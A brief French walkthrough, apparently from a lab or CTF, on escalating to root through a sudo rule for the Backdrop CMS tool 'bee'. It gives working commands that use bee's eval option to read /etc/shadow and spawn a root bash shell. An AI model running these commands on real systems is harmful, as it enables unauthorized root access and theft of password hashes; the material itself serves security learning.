Sudo (bee binary) - Linux Privilege Escalation

Nous vérifions les privilèges sudo :

sudo -l

Nous pouvons exécuter /usr/local/bin/bee en tant que root.

Analyse de Bee

Bee est un outil d'administration pour Backdrop CMS, similaire à Drush pour Drupal. Il permet l'exécution de diverses commandes.

Usage: bee [global-options] [options] [arguments]

Nous identifions l'option eval, qui permet d'exécuter du code PHP arbitraire.

Lecture de /etc/shadow

sudo /usr/local/bin/bee --root=/var/www/html eval 'echo shell_exec("cat /etc/shadow 2>&1");'

Obtention d'un shell root

sudo /usr/local/bin/bee --root=/var/www/html eval 'shell_exec("/bin/bash -p");'

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?